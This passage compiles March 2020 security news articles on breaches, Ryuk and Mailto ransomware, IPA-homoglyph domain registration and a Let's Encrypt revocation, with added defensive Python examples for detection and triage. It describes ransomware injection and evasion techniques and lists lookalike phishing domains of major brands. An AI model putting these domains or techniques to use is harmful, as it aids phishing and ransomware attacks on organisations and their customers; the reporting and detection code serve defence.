T-Mobile suffered another data breach last year that affected its pre-paid customers.

As part of that breach, an attacker gained access to the name and billing address (if provided when establishing an account), phone number, account number, and rate plan and features of pre-paid customers.


YouTube Web Site Subscriptions are Broken, Videos Not Displayed [Fixed]
7.3.2020 
Bleepingcomputer  Vulnerability

A bug on the YouTube web site is telling users that the channels that they have subscribed to have not uploaded any videos yet. On mobile, though, everything is working fine.

When going into the 'Subscriptions' section of the YouTube web site, you would normally see the latest videos from channels you subscribe to.

Over the past few hours, though, users are reporting [1, 2, 3] and BleepingComputer has confirmed that the site is instead showing an error message stating "Your subscriptions haven't uploaded any videos yet. Try finding another channel to subscribe to."

YouTube Subscription Error
As you can see from the above error, I was affected by this bug when using the site in Firefox as well as Chrome.

This error, though, is not happening on the Mobile YouTube app and everything is working correctly.

Unfortunately, generic fixes like logging out and back in, switching browsers, or trying incognito mode to make sure an extension is not causing the issue have not fixed the problem.

There are no issues reported by YouTube on their Twitter account, but DownDetector has seen a huge surge in YouTube problem reports over the past few hours as can be seen by the graph below.

DownDetector YouTube Stats
BleepingComputer has reached out to Google for questions about this issue but has not heard back as of yet.

Update 3/4/2020 10:15 PM EST: The issue has been fixed. No information as to what caused the problem.


Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection
7.3.2020 
Bleepingcomputer  Ransomware

Legal services and e-discovery giant Epiq Global took their systems offline on Saturday after the Ryuk Ransomware was deployed and began encrypting devices on their network.

On March 2nd, legal reporter Bob Ambrogi broke the news that Epiq had globally taken their systems offline after detecting a cyberattack.

This outage affected their e-Discovery platforms, which made it impossible for legal clients to access documents needed for court cases and client deadlines.

Epiq later stated that they were affected by a ransomware attack and took their systems offline to contain the threat.

"On February 29, we detected unauthorized activity on our systems, which has been confirmed as a ransomware attack. As part of our comprehensive response plan, we immediately took our systems offline globally to contain the threat and began working with a third-party forensic firm to conduct an independent investigation.

Our technical team is working closely with world class third-party experts to address this matter, and bring our systems back online in a secure manner, as quickly as possible.

Federal law enforcement authorities have also been informed and are involved in the investigation.

As always, protecting client and employee information is a critical priority for the company. At this time there is no evidence of any unauthorized transfer or misuse or exfiltration of any data in our possession."

Later that night, TechCrunch reported that they were told that the attack affected all of Epiq's 80 global offices and their computers.

Epiq Global's attack started with a TrickBot infection
Today a source in the cybersecurity industry exclusively shared information with BleepingComputer that sheds light on how Epiq Global became infected.

In December 2019, a computer on Epiq's network became infected with the TrickBot malware.

TrickBot is most commonly installed by the Emotet Trojan, which is spread through phishing emails.

Once TrickBot is installed, it harvests various data, including passwords, files, and cookies, from the compromised computer and then tries to spread laterally throughout the network to gather more data.

When done harvesting data on a network, TrickBot will open a reverse shell to the Ryuk operators.

The Ryuk Actors will then have access to the infected computer and begin to perform reconnaissance of the network. After gaining administrator credentials, they will deploy the ransomware on the network's devices using PowerShell Empire or PSExec.

In Epiq Global's case, Ryuk was deployed on their network on Saturday morning, February 29th, 2020, when the ransomware began encrypting files on infected computers.

Ransom Note Created
When encrypting files, the ransomware will create a ransom note named RyukReadMe.html in every folder. All files that were encrypted would also have the .RYK extension appended to them.

Epiq Global's Ryuk Ransom Note
While Ryuk is considered a secure ransomware without any weaknesses in its encryption, Emsisoft's Brett Callow has told BleepingComputer that there may be a slight chance they can help recover files encrypted by the Ryuk ransomware.

“Companies affected by Ryuk should contact us. There is a small - very small - chance that we may be able to help them recover their data without needing to pay the ransom,” Callow told BleepingComputer.com.

While the chances are very small, if your devices are encrypted by the Ryuk Ransomware it does not hurt to check with Emsisoft.

BleepingComputer has reached out to Epiq with further questions about this attack but has not heard back at this time.


Carnival Cruise Line Operator Discloses Potential Data Breach
7.3.2020 
Bleepingcomputer  Incident

The world's largest cruise ship operator Carnival Corporation & plc announced a potential data breach affecting some of its customers after hackers accessed employee email accounts.

Carnival Corporation is included in both the S&P 500 and the FTSE 100 indices, and it owns nine cruise line brands and a travel tour company.

According to the company's corporate website, "Carnival Corporation employs over 120,000 people worldwide and its 10 cruise line brands attract nearly 11.5 million guests annually, which is about 50 percent of the global cruise market."

"Combining more than 225,000 daily cruise guests and 100,000 shipboard employees, more than 325,000 people are sailing aboard the Carnival Corporation fleet every single day, totaling about 85 million passenger cruise days a year."

Network intrusion leading to email compromise
"In late May 2019, we identified suspicious activity on our network," a notification letter sent to Carnival Corporation customers and filed with the Office of the California Attorney General says.

"Upon identifying this potential security issue, we engaged cybersecurity forensic experts and initiated an investigation to determine what happened, what data was affected, and who was impacted.

"It now appears that between April 11 and July 23, 2019, an unsanctioned third party gained unauthorized access to some employee email accounts that contained personal information regarding our guests."

We take privacy and security of personal information very seriously, and we are offering affected individuals free credit monitoring and identity theft detection services through ID Experts to provide you with MyIDCare. - Carnival Corporation

Carnival Corporation adds that, depending on the guest, the hackers might have accessed "customers' names, addresses, Social Security numbers, government identification numbers, such as passport number or driver’s license number, credit card and financial account information, and health-related information."

The letter also says that there currently is no evidence that the impacted customers' personal info was misused after the security incident.

Besides the ongoing investigation regarding this security breach, Carnival Corporation says that it also reported the incident to the relevant law enforcement agencies.

Carnival Corporation's Data Protection Officer Jennifer Garone added that customers who have further questions about the incident can reach out to the company at +1 (833) 719-0091 (U.S. toll-free).


J.Crew Disables User Accounts After Credential Stuffing Attack
7.3.2020 
Bleepingcomputer  Attack

US clothing retailer J.Crew announced that it was the victim of a credential stuffing attack around April 2019 that led to some of its customers' accounts and information being accessed by hackers.

Credential stuffing is a type of attack in which hackers take large collections of username/password combinations, bought on underground markets or leaked in previous security breaches, and replay them to gain access to user accounts on other online platforms.

The success rate of such attacks depends heavily on the common practice of users reusing the same email and password for multiple online accounts.

The attackers' end goal is to log into as many accounts as possible on the targeted site and take over the identities of the account owners, steal money, or gather information.
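The difference between credential stuffing and a plain brute-force attack has a detectable shape: one source tries many distinct accounts a very small number of times each, because it holds one leaked password per account. This added Python example (not J.Crew's tooling) scores login records by that shape and lists the accounts a suspect source got into, which are the ones to disable and reset. The log tuples and both thresholds are constructed for the demo; the IP addresses come from the documentation ranges.

```python
"""Credential-stuffing detection over constructed web-app login records.
Each record is (source IP, username, success)."""
from collections import defaultdict

# Constructed sample: one source walks 42 accounts once each and gets into
# two of them; two other sources behave like ordinary users. Not real data.
SAMPLE_LOGINS = (
    [("203.0.113.7", f"user{i}@example.com", False) for i in range(40)]
    + [("203.0.113.7", "user41@example.com", True),
       ("203.0.113.7", "user42@example.com", True)]
    + [("198.51.100.5", "alice@example.com", False),   # alice mistyped once
       ("198.51.100.5", "alice@example.com", True)]
    + [("198.51.100.9", "bob@example.com", True)]
)


def stuffing_suspects(logins, min_accounts=20, max_attempts_per_account=2.0):
    """Return {src: stats} for sources that touched at least `min_accounts`
    distinct accounts with few attempts per account. Brute force (many tries
    on one account) does not match this shape and is left to other rules."""
    per_src = defaultdict(lambda: {"attempts": 0, "accounts": set(), "successes": 0})
    for src, user, ok in logins:
        stats = per_src[src]
        stats["attempts"] += 1
        stats["accounts"].add(user)
        stats["successes"] += int(ok)
    suspects = {}
    for src, stats in per_src.items():
        n_accounts = len(stats["accounts"])
        if n_accounts >= min_accounts and stats["attempts"] / n_accounts <= max_attempts_per_account:
            suspects[src] = {"accounts": n_accounts, "attempts": stats["attempts"],
                             "successes": stats["successes"]}
    return suspects


def accounts_to_reset(logins, suspects):
    """Accounts a suspect source logged into successfully: the set to disable
    and force through a password reset, as J.Crew did."""
    return sorted({user for src, user, ok in logins if ok and src in suspects})


if __name__ == "__main__":
    found = stuffing_suspects(SAMPLE_LOGINS)
    print(found)
    print(accounts_to_reset(SAMPLE_LOGINS, found))
```

Keying on source IP is the simplest version; real stuffing traffic is often spread across proxies, so production rules usually also aggregate on user-agent, ASN or device fingerprint, and compare against the site's normal per-account failure rate.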

Accounts disabled after almost one year
J.Crew Group is a retailer of apparel, shoes, and accessories that operates 182 J.Crew retail stores, 140 Madewell stores, 170 factory stores, and the jcrew.com, jcrewfactory.com, and madewell.com sites as of March 2, 2020.

In a notice of data breach sent to affected customers, J.Crew says that it discovered "through routine and proactive web scanning" that an unauthorized party was able to log in to their jcrew.com accounts using their email addresses and passwords "in or around April 2019."

"The information that would have been accessible in your jcrew.com account includes the last four digits of credit card numbers you have stored in your account, the expiration dates, card types, and billing addresses connected to those cards, and order numbers, shipping confirmation numbers, and shipment status of those orders," J.Crew's data breach notification explains.

"We do not have reason to believe that the unauthorized party gained access to any additional information within your account."

J. Crew notice of data breach

Customers asked to reset their passwords
Following this incident, J.Crew has disabled the accounts of all impacted customers and asks them to reach out to the J. Crew Customer Care Center at privacy@jcrew.com or 800-205-7956 to reset their passwords.

"You should change your password on any other account where you use the same password discovered in this incident," J.Crew also advises affected customers.

Dunkin' Donuts was the victim of a similar attack a year ago. The company issued a security notification at the time notifying users of their DD Perks reward program that their accounts may have been compromised as part of a credential stuffing attack.

The attackers might have been able to access the account holders' first and last names, their email address, and the 16-digit DD Perks account number and QR code.

Walgreens, the second-largest drugstore chain in the US, also disclosed over the weekend that, because of a bug, some of its mobile apps' users were able to accidentally access other users' personal info, including first and last names, prescription numbers and drug names, store numbers, and shipping addresses where applicable.

The company added that "no financial information such as Social Security number or bank account information was involved in this incident."


Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
7.3.2020 
Bleepingcomputer   OS

Microsoft released PowerShell 7.0, the latest version of its cross-platform automation and configuration tool with new features including automatic new version notifications, bug fixes, and improvements.

PowerShell comes with support for all major operating systems including Windows, Linux, and macOS, and it allows working with structured data like JSON, CSV, and XML, as well as REST APIs and object models.

It provides users with a command-line shell, a framework for processing PowerShell cmdlets, and an associated scripting language focused on automation.

PowerShell 7.0
New PowerShell features
PowerShell 7.0 introduces multiple new features including but not limited to:

• Pipeline parallelization with ForEach-Object -Parallel
• A simplified and dynamic error view and Get-Error cmdlet for easier investigation of errors
• A compatibility layer that enables users to import modules in an implicit Windows PowerShell session
• Automatic new version notifications
• The ability to invoke DSC resources directly from PowerShell 7 (experimental)
• New operators:
- Ternary operator: a ? b : c
- Pipeline chain operators: || and &&
- Null coalescing operators: ?? and ??=

"The shift from PowerShell Core 6.x to 7.0 also marks our move from .NET Core 2.x to 3.1. .NET Core 3.1 brings back a host of .NET Framework APIs (especially on Windows), enabling significantly more backwards compatibility with existing Windows PowerShell modules," Microsoft PowerShell Product Manager Joey Aiello says.

"This includes many modules on Windows that require GUI functionality like Out-GridView and Show-Command, as well as many role management modules that ship as part of Windows."

PowerShell 7.0 fixes and improvements
General Cmdlet updates and fixes:

• Enable Ctrl+C to work for global tool (#11959)
• Fix ConciseView to not show the line information within the error messages (#11952)

Build and packaging improvements:

• Publish PowerShell into the Windows engineering system package format (#11960)
• Bump .NET core framework to 3.1.2 (#11963)
• Ensure the man page gzip has the correct name for LTS release (#11956)
• Bump Microsoft.ApplicationInsights from 2.13.0 to 2.13.1 (#11925)

Install PowerShell 7.0
Microsoft provides installation docs for Windows, macOS, Linux, and ARM users with information on the multiple installation methods available based on the users' OS and their preferred package format.

You can download a PowerShell installer package for one of the following platforms:

Supported platform            Download   How to install
Windows (x64)                 .msi       Instructions
Windows (x86)                 .msi       Instructions
Ubuntu 18.04                  .deb       Instructions
Ubuntu 16.04                  .deb       Instructions
Debian 9                      .deb       Instructions
Debian 10                     .deb
CentOS 7                      .rpm       Instructions
CentOS 8                      .rpm
Red Hat Enterprise Linux 7    .rpm       Instructions
openSUSE 42.3                 .rpm       Instructions
Fedora 30                     .rpm       Instructions
macOS 10.13+                  .pkg       Instructions
Docker                                   Instructions
More information on the full list of platforms and Microsoft products that support this new release is available in Microsoft's PowerShell 7.0 announcement.


Microsoft, Google Offer Free Remote Work Tools Due to Coronavirus
7.3.2020 
Bleepingcomputer  Security

With employees either being quarantined after international travel or encouraged to work remotely due to the Coronavirus (COVID-19), Microsoft, Google, LogMeIn, and Cisco are offering free licenses to their meeting, collaboration, and remote work tools.

Using these products, remote workers will be able to perform virtual meetings and chat with other employees while working remotely from their homes.

Microsoft Teams free for six months
A tweet by JP Courtois, Microsoft EVP and President, Microsoft Global Sales, Marketing & Operations, stated that Microsoft Teams is now available for free for six months to "support public health and safety by making remote work even easier."

Microsoft Tweet

Google offers free access to Hangouts Meet for G Suite users
Google announced this week that they are offering G Suite and G Suite for Education customers free access to their Hangouts Meet video-conferencing features.

This includes the following features:

• Larger meetings, for up to 250 participants per call
• Live streaming for up to 100,000 viewers within a domain
• The ability to record meetings and save them to Google Drive

"These features are typically available in the Enterprise edition of G Suite and in G Suite Enterprise for Education, and will be available at no additional cost to all customers until July 1, 2020," Google stated in their announcement.

LogMeIn offers free Emergency Remote Work Kits
LogMeIn is offering a free Emergency Remote Work Kit that includes free 3-month site-wide licenses to GoToMeeting so that remote workers can join virtual meetings with other employees.

"Starting immediately, we will be offering our critical front-line service providers with free, organization-wide use of many LogMeIn products for 3 months through the availability of Emergency Remote Work Kits. These kits will include solutions for meetings and video conferencing, webinars and virtual events, IT support and management of remote employee devices and apps, as well as remote access to devices in multiple locations. For example, the “Meet” Emergency Remote Work Kit will provide eligible organizations with a free site-wide license of GoToMeeting for 3 months," LogMeIn CEO Bill Wagner said in a blog post.

Cisco offers free enhanced Webex licenses
As we previously reported, Cisco has enhanced its free Webex license to now support meetings with an unlimited amount of time and up to 100 participants.

Cisco is also offering free 90-day licenses to businesses that are not currently Webex customers.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost," Cisco announced.


Windows Explorer Used by Mailto Ransomware to Evade Detection
7.3.2020 
Bleepingcomputer  Ransomware

A newly discovered Mailto (NetWalker) ransomware strain can inject malicious code into the Windows Explorer process so that the malware can evade detection.

While this ransomware, first spotted in August 2019, is known as Mailto after the extension it appends to all encrypted files, the analysis of one of its decryptors shows that its authors dubbed it NetWalker.

As an attack disclosed in early February showed, Mailto not only targets home users but also attempts to compromise enterprise networks and encrypt all of the Windows devices connected to them.

Windows Explorer used to hide in plain sight
Many malware families use process hollowing, creating a process in a suspended state and then unmapping and replacing its memory with malicious code. As Quick Heal found, the operators behind the Mailto ransomware use a different method to achieve the same result.

Instead of creating the 'scapegoat' process in suspended mode, Mailto ransomware will create it in Debug mode and use debug APIs such as WaitForDebugEvent to perform the actual malicious code injection and have the explorer.exe process execute it.

Creating the explorer.exe process in debug mode
Image: Quick Heal
After successfully injecting the malicious payload, the malware gains persistence on the compromised device by adding a registry RUN entry and deletes system shadow copies to prevent the victims from restoring their data after encryption.

The ransomware stores its configuration data, including the "base64 encrypted ransom note, e-mail addresses used in the ransom note, processes that need to be killed if in execution, whitelisted paths, file names and extensions," and everything else it needs, as JSON in the .rsrc section of the payload it injects into explorer.exe.

Payload injected into explorer.exe
"The ransomware and its group have one of the more granular and more sophisticated configurations observed," Head of SentinelLabs Vitali Kremez told BleepingComputer after analyzing a Mailto ransomware sample last month.

When encrypting victims' files, the Mailto ransomware will append an extension using the format .mailto[{mail1}].{id}. For instance, a file named 1.doc will be first encrypted and then renamed to 1.doc.mailto[sevenoneone@cock.li].77d8b.

Mailto also drops ransom notes containing info on what happened to the infected computer, as well as two email addresses the victim can use to get the payment amount and decryption instructions.
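For first-response triage, file names alone tell which of the two families covered in these articles is present: Ryuk (in the Epiq Global article above) appends .RYK and drops RyukReadMe.html, while Mailto appends .mailto[{mail1}].{id}. The following added Python example (not from Quick Heal, Emsisoft or the article) turns those two naming rules into a classifier and tallies a constructed file listing. The listing paths are made up; the Mailto file name is the one quoted in the article.

```python
"""Classify file names by the ransomware naming rules the articles describe
and tally a file listing. Patterns for other families would be added to
PATTERNS as they are observed."""
import re
from collections import Counter

PATTERNS = {
    # Ryuk: original name + ".RYK"
    "Ryuk": re.compile(r"^(?P<original>.+)\.RYK$"),
    # Mailto/NetWalker: original name + ".mailto[<email>].<hex id>"
    "Mailto": re.compile(
        r"^(?P<original>.+)\.mailto\[(?P<email>[^\]]+)\]\.(?P<id>[0-9a-f]+)$",
        re.IGNORECASE),
}
RANSOM_NOTES = {"RyukReadMe.html": "Ryuk"}


def classify(path):
    """Return a dict describing the family a file name matches, or None."""
    base = re.split(r"[\\/]", path)[-1]          # accept both path separators
    if base in RANSOM_NOTES:
        return {"family": RANSOM_NOTES[base], "kind": "note", "original": None}
    for family, pattern in PATTERNS.items():
        m = pattern.match(base)
        if m:
            info = {"family": family, "kind": "encrypted", "original": m.group("original")}
            info.update({k: v for k, v in m.groupdict().items() if k != "original"})
            return info
    return None


def triage(paths):
    """Tally families and collect Mailto contact addresses/IDs across a listing,
    which is what an IR team needs before looking for a decryptor or support."""
    families, contacts = Counter(), set()
    for path in paths:
        hit = classify(path)
        if hit:
            families[hit["family"]] += 1
            if "email" in hit:
                contacts.add((hit["email"], hit["id"]))
    return {"families": dict(families), "mailto_contacts": sorted(contacts)}


# Constructed listing: paths are invented; the Mailto name is from the article.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\1.doc.mailto[sevenoneone@cock.li].77d8b",
    r"C:\Users\alice\Documents\budget.xlsx.mailto[sevenoneone@cock.li].77d8b",
    "D:/share/report.pdf.RYK",
    "D:/share/RyukReadMe.html",
    "D:/share/notes.txt",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
```

In practice the listing would come from a read-only walk of the affected volumes or from an EDR file inventory; the `original` field lets you count which file types were hit and which untouched files can be restored from backup first.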

Mailto encrypted documents
Clears all traces after encrypting files
"After encryption, the ‘explorer.exe’ kills the parent process and deletes the original sample, the file dropped at %ProgramFiles% and also the RUN entry, eradicating the traces of its existence," Quick Heal also discovered.

Mailto ransomware is still being analyzed and it is not yet known if there are any weaknesses in its encryption algorithm that could be used to decrypt locked files for free.

Those who had their files encrypted by Mailto (NetWalker) can find more information about this ransomware and receive support in our dedicated Mailto / Netwalker Ransomware Support & Help Topic.

In related news, Australian transportation and logistics company Toll Group disclosed that systems across business units and multiple sites were encrypted by the Mailto ransomware in February.

Also, Mailto is not the first ransomware spotted while using novel ways to fight against security solutions. A Snatch ransomware strain reboots victims' computers into Safe Mode to disable any resident antimalware solutions and immediately starts encrypting their files once the system restarts.


Microsoft Reveals a New Design for the Windows 10 Start Menu
7.3.2020 
Bleepingcomputer  OS

Microsoft has unveiled its vision of a new Windows 10 Start Menu that utilizes a transparent background to showcase the new Fluent-based colorful icons.

In the latest "#WindowsInsider Webcast", Microsoft shared slides illustrating the changes they are exploring to the Windows 10 Start Menu.

These changes include the new Windows 10 Fluent-based system icons that have begun to roll out to Windows users and a transparent background for the Start Menu program tiles to help the icons stand out.

Currently, the Windows 10 Start Menu tiles include icons with a colored background as shown below in the dark and light themes.

Current Windows 10 Start Menu Tiles
With the new vision of the Start Menu, Microsoft is exploring the idea of using a transparent background and the new Fluent-based icons to "visually unify the start menu from somewhat chaotic color to something that is more uniform."

New Vision of the Windows 10 Start Menu
It has also been widely reported this week that the Windows 10 Live Tiles are being removed from the Start Menu.

During the webcast, Senior Program Manager for the Windows Insider Team Brandon LeBlanc stated that this is not true.

"Live tiles aren't going anywhere right now. It's about blending the new icons better with how they look on Start today. That's what we're discussing now," Brandon LeBlanc stated.

For those who use Live Tiles, you will be able to continue doing so in the future.


Zero-Day Bug Allowed Attackers to Register Malicious Domains
7.3.2020 
Bleepingcomputer  Attack

A zero-day vulnerability impacting Verisign and several SaaS services including Google, Amazon, and DigitalOcean allowed potential attackers to register .com and .net homograph domain names (among others) that could be used in insider, phishing, and social-engineering attacks against organizations.

Before this was disclosed by Soluble security researcher Matt Hamilton in collaboration with security testing firm Bishop Fox to Verisign and SaaS services, anyone could register homograph domain names on gTLDs (.com, .net, and more) and subdomains within some SaaS companies using homoglyph characters.

"Some of these vendors were responsive and engaged in productive dialog, though others have not responded or did not want to fix the issue," Hamilton says.

At this time, only Verisign and Amazon (S3) have remediated this issue, with Verisign deploying changes to gTLD registration rules to block the registration of domains using these homoglyphs.

The issue was discovered by Hamilton after attempting to register domains using Latin homoglyph characters (i.e., Unicode Latin IPA Extension homoglyphs).

IPA homoglyphs

Homograph domains commonly used for malicious purposes
Abusing this domain registration issue can lead to attacks very similar to IDN homograph attacks, presenting the same range of risks.

Homograph attacks happen when threat actors register new domains that look very similar, and sometimes identical, to those of known organizations and companies, and obtain valid certificates for them.

They are usually used as part of scam campaigns that rely on these lookalike domains to redirect potential victims to sites delivering malware or attempting to steal their credentials.

Homograph attacks are nothing new: web browsers expose them by showing the Punycode form of Unicode characters in the address bar, and Verisign and similar providers have rules in place that block the registration of homograph domains. The Unicode Latin IPA Extension character set, however, wasn't blocked until Hamilton's disclosure.

Below you can find the Latin characters and some of the Unicode Latin IPA Extension homoglyph counterparts attackers could have used to register lookalike homograph domains.

• The “ɡ” (Voiced Velar Stop) is the most convincing character—near indistinguishable from its Latin counterpart.
• The “ɑ” (Latin Alpha) is also very convincing, particularly when not adjacent to a Latin “a”.
• The “ɩ” (Latin Iota) is the least convincing of the group. On some systems and fonts this character appears very similar to a lowercase “L”, but it’s more often the case that this character can be discerned from its Latin counterpart.
Attackers started abusing this flaw in 2017
After registering a homograph domain or subdomain that's indistinguishable from the domain of a high-profile company, attackers can launch any number of attacks that take advantage of this, including but not limited to highly targeted phishing and social-engineering attacks against the employees, customers, or users of the organization whose domain is spoofed.

"Between 2017 and today, more than a dozen homograph domains have had active HTTPS certificates," Hamilton says. "This included prominent financial, internet shopping, technology, and other Fortune 100 sites."

He also found that "third-parties had registered and generated HTTPS certificates for 15 of the 300 tested domains using this homoglyph technique."

"Additionally, one instance of a homoglyph domain hosting an unofficial and presumed malicious jQuery library was found.

"There is no legitimate or non-fraudulent justification for this activity (excluding the research I conducted for this responsible disclosure)," Hamilton added.

The homograph domain names registered by abusing this bug were most probably used as part of highly targeted social-engineering campaigns directed at employees of high-profile government and privately held organizations rather than common phishing campaigns targeting random victims.

As part of the research process, Hamilton also registered the following homograph domains using Unicode Latin IPA Extension homoglyph characters to show the impact they could have if used for malicious purposes (some of them have already been transferred to the owners of the non-homograph domains):

amɑzon.com
Chɑse.com
Sɑlesforce.com
ɡmɑil.com
ɑppɩe.com
ebɑy.com
ɡstatic.com
steɑmpowered.com
theɡuardian.com
theverɡe.com
Washinɡtonpost.com
pɑypɑɩ.com
wɑlmɑrt.com
wɑsɑbisys.com
yɑhoo.com
cɩoudfɩare.com
deɩɩ.com
gmɑiɩ.com
gooɡleapis.com
huffinɡtonpost.com
instaɡram.com
microsoftonɩine.com
ɑmɑzonɑws.com
ɑndroid.com
netfɩix.com
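The three homoglyphs described above and the research domains just listed make a good test set for a defensive check. The following Python is an added example, not Hamilton's tool and not part of the original article: it finds characters from the Unicode Latin IPA Extensions block (U+0250 to U+02AF) in a domain, maps the three confusables the article names to the ASCII letters they imitate, shows the "xn--" form a browser address bar would display, and compares the result against a list of brand names to protect. The lookalike mapping, the protected list and the sample domains are this example's own constructed inputs.

```python
import unicodedata

# The Unicode Latin IPA Extensions block; this is the character set the
# disclosure found registries were not blocking.
IPA_BLOCK = range(0x0250, 0x02B0)

# Homoglyphs named in the article mapped to the ASCII letter they imitate.
# The mapping is this example's own; extend it as new confusables are found.
IPA_LOOKALIKES = {
    "\u0261": "g",  # LATIN SMALL LETTER SCRIPT G (the "voiced velar stop")
    "\u0251": "a",  # LATIN SMALL LETTER ALPHA
    "\u0269": "l",  # LATIN SMALL LETTER IOTA
}


def ipa_characters(domain):
    """Return the Unicode names of every IPA Extension code point in the domain."""
    return [unicodedata.name(ch, "UNKNOWN") for ch in domain if ord(ch) in IPA_BLOCK]


def ascii_skeleton(domain):
    """Replace the known IPA homoglyphs with the ASCII letters they resemble."""
    return "".join(IPA_LOOKALIKES.get(ch, ch) for ch in domain.lower())


def punycode_form(domain):
    """Render non-ASCII labels the way a browser address bar shows them (xn-- form)."""
    labels = []
    for label in domain.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def classify(domain, protected):
    """Describe a domain: IPA characters present, its xn-- form, and which
    protected name (if any) it would be mistaken for."""
    ipa = ipa_characters(domain)
    skeleton = ascii_skeleton(domain)
    return {
        "domain": domain,
        "punycode": punycode_form(domain),
        "ipa_chars": ipa,
        "impersonates": skeleton if ipa and skeleton in protected else None,
    }


def scan(domains, protected):
    """Return the classification of every domain that impersonates a protected name."""
    return [c for c in (classify(d, protected) for d in domains) if c["impersonates"]]


# Constructed inputs: a few of the research domains listed in the article plus
# genuine names, checked against an allow-list of brands to protect.
PROTECTED = {"amazon.com", "paypal.com", "gmail.com", "apple.com"}
SAMPLE_DOMAINS = ["amɑzon.com", "pɑypɑɩ.com", "ɡmɑil.com", "amazon.com", "example.com"]

if __name__ == "__main__":
    for hit in scan(SAMPLE_DOMAINS, PROTECTED):
        print(hit["domain"], "->", hit["punycode"], "looks like", hit["impersonates"])
```

The same skeleton comparison can be run over newly issued names pulled from Certificate Transparency logs, which is the detection angle the article's own tooling takes.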

Fixed by Verisign
Verisign, the authoritative registry for the .com, .net, .edu, and several other generic top-level domains (gTLDs), has fixed the flaw and now restricts the registration of domains using these homoglyph characters, and it has also changed domain name registration rules by updating the table of allowed characters in newly registered domains.

"While the underlying issue described by Mr. Hamilton is well understood by the global Internet community – and is the subject of active policy development by ICANN – we appreciate him providing additional timely details about how this issue may be exploited," Verisign said in a statement.

"Although we understand that ICANN has been on a path to address these issues globally, we have also proactively updated our systems and obtained the necessary approval from ICANN to implement the changes to the .com and .net top-level domains required to prevent the specific types of confusable homograph registrations detailed in Mr. Hamilton’s report.

Following the disclosure, a tool for generating domain permutations using these homoglyph characters and checking them against Certificate Transparency logs was also created and is now available online.

More details and the full disclosure timeline can be found in Hamilton's full report on this new type of homograph attack.


Let's Encrypt to Revoke 3 Million TLS Certificates Due to Bug
7.3.2020 
Bleepingcomputer   Vulnerability

Let's Encrypt will revoke over 3 million certificates on Wednesday, March 4th, due to a bug in their domain validation and issuance software.

A bug in Let's Encrypt's certificate authority (CA) software caused some certificates to not be properly validated through Certificate Authority Authorization (CAA) configured for an associated domain.

CAA is a security feature that allows domain administrators to create a DNS record that restricts the certificate authorities that are allowed to issue certificates for that particular domain.

As part of the rules for this feature, certificate authorities must have checked CAA records no more than 8 hours before a certificate is issued.

A bug in their CA software, called Boulder, caused one domain on a multi-domain certificate to be rechecked repeatedly instead of every domain on the certificate being checked once. This caused certificates to be issued without the proper CAA checks for some domains.

"The bug: when a certificate request contained N domain names that needed CAA rechecking, Boulder would pick one domain name and check it N times. What this means in practice is that if a subscriber validated a domain name at time X, and the CAA records for that domain at time X allowed Let’s Encrypt issuance, that subscriber would be able to issue a certificate containing that domain name until X+30 days, even if someone later installed CAA records on that domain name that prohibit issuance by Let’s Encrypt," Let's Encrypt's incident report explained.
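To make the quoted bug concrete, here is a small Python model of the CAA recheck step, added for this write-up and not Boulder's code: one function repeats the reported mistake of rechecking a single name N times, the other checks each name once. The CAA records, the issuer identifier and the two names are constructed for the example; the 8-hour and 30-day windows are the figures quoted above.

```python
from datetime import datetime, timedelta, timezone

RECHECK_WINDOW = timedelta(hours=8)   # CAA must be (re)checked within 8h of issuance
AUTHZ_LIFETIME = timedelta(days=30)   # a validated name may be reused for up to 30 days
ISSUER = "letsencrypt.org"


def caa_allows(records, name, issuer):
    """Constructed CAA lookup: climb from `name` to the closest ancestor that has
    CAA records; with no records anywhere in the tree, any CA may issue."""
    labels = name.split(".")
    for i in range(len(labels)):
        ancestor = ".".join(labels[i:])
        if ancestor in records:
            return issuer in records[ancestor]
    return True


def names_needing_recheck(names, validated_at, now):
    """Names validated more than 8 hours ago; anything older than 30 days must be
    validated from scratch, which this model signals with ValueError."""
    stale = []
    for name in names:
        age = now - validated_at[name]
        if age > AUTHZ_LIFETIME:
            raise ValueError(f"{name}: authorization expired, revalidate")
        if age > RECHECK_WINDOW:
            stale.append(name)
    return stale


def recheck_buggy(names, validated_at, now, records):
    """The reported defect: pick one stale name and check it len(stale) times."""
    stale = names_needing_recheck(names, validated_at, now)
    if not stale:
        return True
    one = stale[0]
    return all(caa_allows(records, one, ISSUER) for _ in stale)


def recheck_fixed(names, validated_at, now, records):
    """Correct behaviour: every stale name is checked exactly once."""
    stale = names_needing_recheck(names, validated_at, now)
    return all(caa_allows(records, name, ISSUER) for name in stale)


# Constructed scenario: both names were validated two days ago; since then the
# owner of blog.example.com published a CAA record permitting only another CA.
NOW = datetime(2020, 3, 3, 12, 0, tzinfo=timezone.utc)
NAMES = ["www.example.com", "blog.example.com"]
VALIDATED_AT = {name: NOW - timedelta(days=2) for name in NAMES}
CAA_RECORDS = {"blog.example.com": {"other-ca.example"}}

if __name__ == "__main__":
    print("buggy:", recheck_buggy(NAMES, VALIDATED_AT, NOW, CAA_RECORDS))  # True (wrong)
    print("fixed:", recheck_fixed(NAMES, VALIDATED_AT, NOW, CAA_RECORDS))  # False
```

Note that the buggy version only gives the right answer by luck, when the name it happens to pick is the one whose CAA record changed; that is why every certificate issued through the affected path had to be revoked rather than just those known to be wrong.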

Due to this, tomorrow Let's Encrypt will be revoking 3,048,289 currently-valid certificates, which is 2.6% of their overall ~116 million active certificates.

For those affected, Let's Encrypt has emailed users, who must renew their certificates by tomorrow before they become invalid.

Email sent to affected users
Source: Twitter
To check if your domain is affected by this bug and needs to be renewed, you can use the tool at https://checkhost.unboundtest.com/.

Simply enter your domain name and the page will tell you if you are affected or not. Those who are affected will be shown a message similar to the one below:

"The certificate currently available on [hostname] needs renewal because it is affected by the Let's Encrypt CAA rechecking problem. Its serial number is [serial number]. See your ACME client documentation for instructions on how to renew a certificate."

With only 24 hours to renew their certificates, many users are scrambling to get them done and some are running into issues.

Let's Encrypt recommends users refer to this help document for more information and post in the 'Get Help forums' if needed.


